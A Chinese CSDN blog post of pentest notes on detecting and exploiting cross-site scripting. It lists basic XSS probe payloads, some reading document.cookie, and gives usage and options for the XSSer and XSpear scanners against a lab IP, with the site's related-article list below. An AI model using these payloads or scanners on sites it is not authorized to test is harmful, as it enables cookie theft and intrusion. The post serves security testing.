XSS(五) xss检测与利用

最新推荐文章于 2024-04-22 08:59:16 发布
最新推荐文章于 2024-04-22 08:59:16 发布
阅读量99 收藏
点赞数 3
分类专栏: xss 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shirlly_/article/details/137723783
版权

XSS(五) xss检测与利用

1. 测试payload

<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<img src="javascript:alert('XSS')">
onerror="alert('XSS')">

2. XSSER

xsser -h

简单的注入攻击
xsser -u “http://192.168.169.130/xss/example1.php?name=hacker”
选择“google”作为搜索引擎从Dork注入
xsser –De “google” -d “search.php?q=”
从URL执行多个注入,自动有效载荷,并建立反向连接。
xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” –auto –reverse-check -s
简单的URL注入,使用GET,Cookie注入并使用DOM shadow
xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” -g “/path?vuln=” –Coo –Dom –Fp=”vulnerablescript”
启发式参数过滤
xsser -u “http://192.168.169.130/xss/example1.php?name=hacker” –heuristic
启动GUI界面
xsser –gtk

option:-
-gtk 启动XSSer GTK界面

Select Target(s):
--all=TARGET        自动审计整个目标
-u URL, --url=URL   输入要审计的目标
-i READFILE         从文件中读取目标URL
-d DORK             使用查询搜索目标(例如:'news.php?id=')
-l                  从一组“dorks”中搜索
--De=DORK_ENGINE    使用此搜索引擎(默认:DuckDuckGo)
--Da                使用所有搜索引擎进行大规模搜索

Select type of HTTP/HTTPS Connection(s):
-g GETDATA          使用GET发送载荷(例如:'/menu.php?id=XSS')
-p POSTDATA         使用POST发送载荷(例如:'foo=1&bar=XSS')
-c CRAWLING         在目标上爬行的URL数:1-99999
--Cw=CRAWLER_WIDTH  爬虫的深度级别:1-5(默认:2)

Configure Request(s):
--cookie=COOKIE     更改您的HTTP Cookie头

3. XSpear

Xspear -u "" -v 1

[选项] 
-u, --url=target_URL [必填] 目标URL 
-d, --data=POST Body [可选] POST方法体数据 
-a, --test-all-params [可选] 测试所有参数(包括未反射的) 
--no-xss [可选] 不进行XSS测试,仅进行参数分析 
--headers=HEADERS [可选] 添加HTTP头 
--cookie=COOKIE [可选] 添加Cookie 
--custom-payload=FILENAME [可选] 加载自定义负载JSON文件 
--raw=FILENAME [可选] 加载原始文件(例如raw_sample.txt) 
--raw-ssl=BOOLEAN [可选] Burp原始文件的http/https切换,例如:true/false 
-p, --param=PARAM [可选] 测试参数 
-b, --BLIND=URL [可选] 添加Blind XSS向量 + 与XSS Hunter、ezXSS、HBXSS等一起使用... + 例如:-b https://hahwul.xss.ht 
-t, --threads=NUMBER [可选] 线程,默认值为10 
-o, --output=FORMAT [可选] 输出格式(cli,json,html) 
-c, --config=FILENAME [可选] 使用config.json 
-v, --verbose=0~3 [可选] 显示日志深度 + v=0:安静模式(仅显示结果) + v=1:显示扫描状态(默认) + v=2:显示扫描日志 + v=3:显示详细日志(请求/响应) 
-h, --help 打印此帮助信息 --version 显示XSpear版本 --update 显示如何更新

4. XSStrike

hi_luyi
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BurpSuite实战十九之XSS检测实战
悦分享
06-12 1468
XSS(跨站脚本攻击)漏洞是Web应用程序中最常见的漏洞之一,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之,嵌入其中Web里面的html代码会被执 行,从而达到恶意攻击用户的特殊目的,比如获取用户的cookie,导航到恶意网站,携带木马等。根据其触发方式的不同,通常分为反射型XSS、存储型XSS和DOM-base型XSS。漏洞“注入理论”认为,所有的可输入参数,都是不可信任的。大多数情况下我们说的不可信任的数据是指来源于HTTP客户端请求的URL参数、form表单、Headers
Java防止xss攻击附相关文件下载
08-25
首先说一下思路,防止这种类似于注入攻击,就是使用拦截器(Filter)处理特殊字符或过滤特殊字符 今天介绍一个方法,利用覆盖Servlet的getParameter方法达到处理特殊字符的目的来解决(防止)Xss攻击 web.xml,需要的...
XSS利用
YIN_XIAOMAO的博客
05-29 261
XSS利用方式较多,多研究总有一个适合你,XSS防御方式较多,多种方式联动防御才好。
ajax在Xss中的利用,Ajax Web应用程序的XSS漏洞检测
weixin_32602879的博客
08-06 8368
摘要:Web2.0已成为目前网络上的热点技术,作为其核心技术的Ajax给用户带来了无刷新的网络快速浏览新体验。但是,临界于桌面应用程序的“胖客服端”与Web应用程序的“瘦客户端”机制,Ajax技术的使用造成web应用程序同具备这两种客户端特点的安全威胁。一方面Ajax将部分逻辑转嫁到客户端相应的暴露程序的部分业务逻辑;另一方面与Web服务器的交互信息以及可能的匿名访问也存在着潜在的攻击利用价值。...
XSS漏洞检测利用
最新发布
2401_84434570的博客
04-22 794
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞。
xss漏洞利用方式总结
zlloveyouforever的博客
10-13 2465
XSS漏洞利用方式简单总结。有问题的同学请私信我,文章中网页挂马这一部分确实比较难实现。 此平台优点:界面布局清新、数据可阅读性好、IP获取准确、IP地址定位精准、轻量级(无需数据库)、对数据存储进行加密、GitHub开源方便与开发者交流(生命周期长)。 可以看到,BlueLotus平台还提供了一些js模板,便于我们参考或者构
戏耍XSS的一些技巧
02-20
当你手工或者软件挖到一个页面的xss(无论是反射xss或者储蓄xss都可以),这个候想要深入的利用这个漏洞,该怎么做呢?用WebRTC来内网端口检测?盗取cookies(登陆页面和注册页面一般都不会有用户cookies)?用...
Input XSS最新漏洞及利用
06-12
像注入漏洞的“’”、“and 1=1”和“and 1=2”一样,Input XSS也有自己的漏洞检测字符串,它们就是“”、“”和 “<script>alert(/xss/)”。如果当你在Input框中输入“”,并在新 页面的源代码中找到这对标签的话,...
windows上利用cygwin 使用ratproxy检测xss
05-27
NULL 博文链接:https://fighter1945.iteye.com/blog/564702
XSSer:自动化XSS漏洞检测利用工具
09-04
XSSer:自动化XSS漏洞检测利用工具 跨站点“Scripter”(又名XSSer)是一个自动化框架,用于检测利用以及报告基于Web应用程序 中的XSS漏洞。 它包含多个尝试绕过某些过滤器的选项,以及各种特殊的代码注入技术。
ASP.NET Core中如何利用Csp标头对抗Xss攻击
01-01
内容安全策略(CSP)是一个增加的安全层,可帮助检测和缓解某些类型的攻击,包括跨站点脚本(XSS)和数据注入攻击。这些攻击用于从数据窃取到站点破坏或恶意软件分发的所有内容(深入CSP) 简而言之,CSP是网页控制...
调查:XSS攻击Web应用程序-研究论文
05-20
尽管采用了安全的编码技术并使用了漏洞检测工具,但XSS仍保留在许多Web应用程序中,因为该方法非常复杂,方法的实现不正确,缺乏漏洞知识。 在本文中,我们调查了XSS攻击,预防基于存储的XSS和基于DOM的XSS的原因和...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击是指攻击者利用网站没有对用户提交代码进行转义处理或者过滤不足的缺点,进而添加一些新代码,嵌入到Web页面中,使得其他用户访问都会执行相应的嵌入代码,从而盗取用户资料,利用用户身份进行某些...
xsser:跨站点“ Scripter”(又名XSSer)是一种自动框架,用于检测利用和报告基于Web的应用程序中的XSS漏洞
05-07
网址: : 跨站点“脚本程序”(又名XSSer)是一种自动框架,用于检测利用和报告基于Web的应用程序中的XSS漏洞。 它提供了几个选项来尝试绕过某些过滤器以及各种特殊的代码注入技术。 XSSer已预先安装了[> 1300 ...
基于Python的XSS测试工具XSStrike使用方法
01-20
XSStrike 是一款用于探测并利用XSS漏洞的脚本 XSStrike目前所提供的产品特性: 对参数进行模糊测试之后构建合适的payload 使用payload对参数进行穷举匹配 内置爬虫功能 检测并尝试绕过WAF 同支持GET及POST方式 ...
信息安全技术(二)——利用DOM XSS
Wine_in_glass的博客
06-27 383
这一实验主要根据实验指导书完成了对于XSS的基本操作,其中反射型XSS最为简单。而存储型XSS和基于DOM的XSS的效果更好,危害也更大。反射型XSS,相对来说,危害较低,需要用户点击特定的链接才能触发。存储型XSS,会把攻击代码保存到数据库,所以也叫持久型XSS,因为它存在的间是比较长的。DOM 型XSS,这类XSS主要通过修改页面的DOM节点形成XSS,称为DOM Based XSS不需要服务器。
Xenotix_XSS_Exploitation_Framework
01-07
Xenotix XSS Exploit Framework是一款用于检测利用WEB应用程序中的XSS漏洞的渗透测试工具。这个工具可以将代码注入到含有xss漏洞的web页面中。 Xenotix的主要特点: •内置XSS Payloads •XSS键盘记录 •XSS ...
基于Fuzzing技术提升XSS漏洞防御水平的研究
01-27
本文提出了一种主动提升对XSS漏洞的检测与防御能力的方法,该方法通过网络爬虫爬取Web交互页面,结合XSS漏洞的特征,基于Fuzzing技术主动挖掘潜在漏洞,利用渗透工具模拟攻击并捕获网络攻击流量,提取攻击特征,最终...
基于爬虫的xss漏洞检测工具设计与实现
10-11
基于爬虫的XSS漏洞检测工具设计与实现是指利用爬虫技术来自动化地扫描和检测网站中的XSS漏洞。以下是一个基于爬虫的XSS漏洞检测工具的设计与实现的简要介绍: 1. 设计思路与流程: - 定义目标:确定要检测的目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值